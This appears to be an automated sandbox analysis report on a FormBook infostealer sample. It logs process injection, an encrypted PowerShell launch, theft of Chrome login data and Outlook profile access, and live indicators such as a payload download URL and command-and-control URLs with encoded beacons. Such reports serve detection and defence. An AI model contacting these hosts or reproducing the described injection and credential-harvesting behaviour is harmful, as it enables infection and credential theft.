Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\SC_0017384.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831200 Sample: SC_0017384.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 53 www.funhood.life 2->53 77 Snort IDS alert for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 3 other signatures 2->83 11 SC_0017384.exe 16 7 2->11         started        signatures3 process4 dnsIp5 61 a.uguu.se 188.40.83.211, 443, 49698, 49700 HETZNER-ASDE Germany 11->61 47 C:\Users\user\AppData\...\Lvdnyvcvr.exe, PE32 11->47 dropped 49 C:\Users\...\Lvdnyvcvr.exe:Zone.Identifier, ASCII 11->49 dropped 51 C:\Users\user\AppData\...\SC_0017384.exe.log, ASCII 11->51 dropped 103 Encrypted powershell cmdline option found 11->103 105 Injects a PE file into a foreign processes 11->105 16 SC_0017384.exe 11->16         started        19 powershell.exe 16 11->19         started        file6 signatures7 process8 signatures9 69 Modifies the context of a thread in another process (thread injection) 16->69 71 Maps a DLL or memory area into another process 16->71 73 Sample uses process hollowing technique 16->73 75 Queues an APC in another process (thread injection) 16->75 21 explorer.exe 6 5 16->21 injected 25 conhost.exe 19->25         started        process10 dnsIp11 55 www.emprendizajesocial.com 217.160.0.229, 49703, 49704, 80 ONEANDONE-ASBrauerstrasse48DE Germany 21->55 57 www.findmyoriginstory.com 74.208.236.131, 49702, 80 ONEANDONE-ASBrauerstrasse48DE United States 21->57 59 5 other IPs or domains 21->59 85 System process connects to network (likely due to code injection or exploit) 21->85 27 Lvdnyvcvr.exe 14 4 21->27         started        31 systray.exe 13 21->31         started        33 Lvdnyvcvr.exe 21->33         started        signatures12 process13 dnsIp14 63 a.uguu.se 27->63 87 Multi AV Scanner detection for dropped file 27->87 89 Machine Learning detection for dropped file 27->89 91 Encrypted powershell cmdline option found 27->91 35 powershell.exe 27->35         started        37 Lvdnyvcvr.exe 27->37         started        93 Tries to steal Mail credentials (via file / registry access) 31->93 95 Tries to harvest and steal browser information (history, passwords, etc) 31->95 97 Modifies the context of a thread in another process (thread injection) 31->97 99 Maps a DLL or memory area into another process 31->99 65 192.168.2.1 unknown unknown 33->65 67 a.uguu.se 33->67 101 Injects a PE file into a foreign processes 33->101 39 powershell.exe 33->39         started        41 Lvdnyvcvr.exe 33->41         started        signatures15 process16 process17 43 conhost.exe 35->43         started        45 conhost.exe 39->45         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
54.85.86.211
 brunaeleandro.com United States
14618 AMAZON-AESUS true
172.67.152.24
 www.madisoncountylincoln.com United States
13335 CLOUDFLARENETUS true
74.208.236.131
 www.findmyoriginstory.com United States
8560 ONEANDONE-ASBrauerstrasse48DE true
217.160.0.229
 www.emprendizajesocial.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
172.67.194.225
 www.metatv.app United States
13335 CLOUDFLARENETUS true
188.40.83.211
 a.uguu.se Germany
24940 HETZNER-ASDE false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
www.madisoncountylincoln.com 172.67.152.24 true
a.uguu.se 188.40.83.211 true
www.funhood.life 162.213.249.254 true
brunaeleandro.com 54.85.86.211 true
www.emprendizajesocial.com 217.160.0.229 true
www.metatv.app 172.67.194.225 true
www.findmyoriginstory.com 74.208.236.131 true
www.brunaeleandro.com unknown unknown
www.myprojoints.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.emprendizajesocial.com/t4np/ true
  • Avira URL Cloud: safe
 unknown
http://www.metatv.app/t4np/ true
  • Avira URL Cloud: safe
 unknown
http://www.madisoncountylincoln.com/t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== true
  • Avira URL Cloud: safe
 unknown
http://www.metatv.app/t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 true
  • Avira URL Cloud: safe
 unknown
http://www.madisoncountylincoln.com/t4np/ true
  • Avira URL Cloud: safe
 unknown
http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== true
  • Avira URL Cloud: safe
 unknown
http://www.findmyoriginstory.com/t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== true
  • Avira URL Cloud: safe
 unknown
http://www.brunaeleandro.com/t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 true
  • Avira URL Cloud: safe
 unknown
https://a.uguu.se/fwvfviJb.dat false
    		high
    http://www.brunaeleandro.com/t4np/ true
    • Avira URL Cloud: safe
    		 unknown